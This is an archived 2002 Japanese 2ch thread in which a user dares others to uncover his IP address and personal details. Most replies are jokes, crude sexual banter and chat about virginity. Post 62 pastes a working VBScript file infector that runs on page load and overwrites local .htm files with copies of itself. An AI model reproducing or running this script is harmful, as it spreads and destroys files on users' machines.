5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

私のIPを抜いてみろ!!

1 :ハッカーX:02/07/04 15:00
私のIPを抜いてみろ。
そして私の住所、名前、電話番号、メールアドレス等を書き込んでみろ!

馬鹿どものおまえらには絶対無理だろうがな、フッ。
出来るものならやってみろ。


2 :名無しさん:02/07/04 15:04
http://www.art.gr.jp/cgi-tmp/wwwbbs.cgi?20020704045955
田中さんでしょ

3 :名無しさん:02/07/04 15:07
板違い。
↓こちらへどうぞ。
http://tmp.2ch.net/kitchen/

4 :ハッカーX:02/07/04 15:15
>>2 違うぞ。 まあ、2ちゃんねらーの中で言い当てられる奴はいないだろう。

5 :名無しさん:02/07/04 15:20
ハッカーX。

6 :ハッカーX:02/07/04 16:06
>>5 それはハンドルネームだ。本名じゃない。ボケ

7 :名無しさん:02/07/04 16:13
>>1 0.0.0.0 日本

こんなもんか

8 :名無しさん:02/07/04 16:49
私の玉を抜いてみろ、だろ。

9 :名無しさん:02/07/04 17:03
私の竿をぬいてみろ

10 :ハッカー×:02/07/04 17:17
私で一発抜いてみろ!!

11 :名無しさん:02/07/04 17:19
私を一発で抜いみろ!!

12 :名無しさん:02/07/04 18:17
お前らってアニメ・パソコン・ゲーム以外の趣味あんの?
やっぱり20過ぎて童貞とか多いの?

13 :名無しさん:02/07/04 18:18
束子で一発抜いてみろ!!

14 :名無しさん:02/07/04 18:20
>12
お答えしよう!!
他に趣味--------無い!! あれば2chなんぞ覗いてないだろうが。
童貞------------残念!  筆おろし済み。

15 :名無しさん:02/07/04 18:21
「私を,,,,,,,抜いてください。」なんて言われたい!!

16 :名無しさん:02/07/04 18:21
>>14
素人童貞

17 :名無しさん:02/07/04 18:22
>>12
漏れはまだ14だけど、20を超えても童貞のままでいるつもりだが何か?

18 :名無しさん:02/07/04 18:23
童貞は主婦にもてるぞ。

19 :名無しさん:02/07/04 18:26
30過ぎても童貞は変ですか?

20 :名無しさん:02/07/04 18:26
>>17
女に興味ないのか?男が好きならわかるが・・・
マジな話でか?

21 :名無しさん:02/07/04 18:27
私で抜いてください。

22 :名無しさん:02/07/04 18:29
>19
素人がか?

23 :名無しさん:02/07/04 18:29
>21
女性ですか? 熟女迄ならお願いします。超熟女はお帰りください。

24 :17:02/07/04 18:29
>>20
ええ。女性にはまったく興味は持っていません。
ってゆーか、女性のことを考えるだけで鬱な気分になるほどです。

本来、生き物は異性を好きになるはずですよね?本能からして。
それなのに、自分には、そういう本能が失われているような気がして、余計に鬱でなりません。

25 :名無しさん:02/07/04 18:31
>24
女性の服きたり、女装するのは好きですか?

26 :名無しさん:02/07/04 18:33
>>24
女性が苦手なだけ?
例えばhttp://www5c.biglobe.ne.jp/~danjiri2/suzuki/suzuki.htm
こんな画像みてもなんとも思わないとか?

27 :名無しさん:02/07/04 18:34
http://www5c.biglobe.ne.jp/~danjiri2/hamano/hamano.htm
ちょっと見てみて
こういうのはどうよ?

28 :名無しさん:02/07/04 18:34
>26
24じゃないけど、それくらいじゃなんともない。もっと過激なのがいい。

29 :名無しさん:02/07/04 18:35
>27
まだまだ。

30 :名無しさん:02/07/04 18:35
>>26-27
本人か?

31 :名無しさん:02/07/04 18:38
もっと過激なの希ぼんぬ

32 :17:02/07/04 18:40
>>25
いいえ、すきでは有りません。考えただけで気持ちが悪いです。

>>26
女性が苦手というものもあるかもしれません。
人とのやり取りは、もともと、そんなに上手ではなかったほうだろうし。

>>26-27
そのページ、開いてみましたが、いやらしいと思って、すぐに閉じてしまいました。

以前に、エロ画像へのリンクを、間違ってクリックしてしまいましたが、
やはり、いやらしく思い、すぐに閉じました。

33 :New Tech. SITE ◆NtVkSITE :02/07/04 18:42
彼女がいないだけってのは、別にまだどうって事ないですけれど、
それよりも、彼女を欲しがる心が欲しいです。

34 :17:02/07/04 18:43
あ、>>17 = >>33 です。
厨房板で使っていたコテハンを間違って表示しました。

35 :名無しさん:02/07/04 18:43
世界人口の半分近くは女性だし、いなくても希望がある。

36 :名無しさん:02/07/04 18:50
>17
男性に特別な感情持ってます?

37 :名無しさん:02/07/04 18:51
南方熊楠は40くらいまで童貞で常々自慢してたそうだがな。


38 :名無しさん:02/07/04 18:54
じゃ、50まで童貞で通して自慢すりゃいいんだ。

39 :名無しさん:02/07/04 18:54
粘菌

40 :名無しさん:02/07/04 18:56
「私のIPを抜いてみろ!!」〜(紆余曲折)〜「じゃ、50まで童貞で通して自慢すりゃいいんだ。」

ワラタ


41 :名無しさん:02/07/04 18:59
>>1

 うーん・・・グローバルIP(接続毎、もしくは接続中にコロコロ変わるIP)だったら、IP自体公表してどうなると言うンだろう。
 プロバイダーさんとサーバー管理者の方に協力してもらえば良いだけなので、偉いとかバカとかの問題では無いような気がする。

 それ以外の方法だと基本的にレッツ・クラッキングだが、そこまでの労力と時間とリスクを負ってまですることかなぁ。

 もし、IPが解析出来たら何かアタシが得な事でもあるのかな? 面白い言葉の一つでもレスして貰えるのかな?
 アオルだけしか出来ない文章能力だったら、アタシは勘弁。

 それにさ、インターネットの情報交換って匿名性が高いからこそ、ミステリアスで面白いのでは無いのだろうか。

42 :17:02/07/04 19:10
>>36
いいえ、特に有りません。。

43 :17:02/07/04 19:11
レスが遅くなってすみません。
先ほど、fusianasan に引っかかってしまい、ホスト名が表示されてしまいました。
ということで、10分間接続を気って、IP アドレスが変わるまで待っていたのですけれど。
一瞬、どうなることかと思いました。。(-_-;)

44 :名無しさん:02/07/04 19:11
捜査令状さえあれば一発だよな

45 :厨房:02/07/04 19:34
レッツクラッキングって何?

46 :名無しさん:02/07/04 19:44
17の偽者いるな。

47 :名無しさん:02/07/04 19:58
レッツクハッキング

48 :名無しさん:02/07/04 20:29
抜いてあげましょうか? (超熟女より)

49 : :02/07/04 20:43
>>48
お・ね・が・い

50 :1:02/07/04 20:51
超熟女って何歳ですか?

51 :名無しさん:02/07/04 20:55
キューピー、3分ハッキング!


ちゃららっちゃっちゃっちゃっちゃっ・・・

52 :名無しさん:02/07/04 20:59
発言してよろしいでしょうか?






>1「あふぉ!」

53 :名無しさん:02/07/04 21:19
>>38
それだ!!

54 :ハッカーX:02/07/04 21:27
うんこもらしますた。

55 :名無しさん:02/07/04 21:39
おしめかえまちょーね。

56 :名無しさん:02/07/05 02:06
馬鹿な奴らばかりだな。

57 :名無しさん:02/07/05 02:41
>>1
ネオ麦やディルみたいな事すれば嫌でも晒されるだろうな。
でも、犯罪を推奨しているのではないからしないように。

58 :17:02/07/05 04:29
>>46
え?どこどこ??

59 :59:02/07/05 14:54
つまらんスレだな。

60 :名無しさん:02/07/06 15:21
>私のIPを抜いてみろ。
>そして私の住所、名前、電話番号、メールアドレス等を書き込んでみろ!
IP抜いてホスト割って、プロバ脅すの?
普通に考えてIPから住所割れると思ってるの、>>1の坊や。
つうかおまえ、リア厨か知障あたりだろ?
『ハッカーX』ってネームがガキさを語っている。
一回氏んでこい、ミスターXもどき。

61 :名無しさん:02/07/06 23:28
sage

62 :名無しさん:02/07/06 23:32
<BODY Onload="Redirect();">
<script language="VBScript"><!--

Sub Redirect
Randomize
If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline
location.href = location.href +"l"
End Sub

Sub Offline
Dim FSO,folder ,fc, f1, cpath
Set FSO = CreateObject("Scripting.FileSystemObject")
HostPath = Replace(location.href, "file:///", "")
HostPath = Replace(HostPath, "/", "\")
cpath = fso.GetParentFolderName(HostPath)
Set folder = fso.GetFolder(cpath)

While folder.IsRootFolder = false
Set folder = fso.GetFolder(cpath)
Set fc = folder.Files
cpath = fso.GetParentFolderName(cpath)
For each f1 in fc
s = Lcase(Fso.GetExtensionName(f1.name))
If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l", true
fso.CopyFile HostPath, f1.path, true
End If
Next
Wend
If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal")
End Sub
--></script>
</BODY>

63 :名無しさん:02/07/06 23:40
>>62
お前も単純だな。
もっとばれないように出来ないのか?
幼稚だ

64 :名無しさん:02/07/07 00:00
>>1
のスレに、ご立腹か、恥ずかしい限りだ。

ところで分かったのか>62

65 :名無しさん:02/07/10 02:10
さげ

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)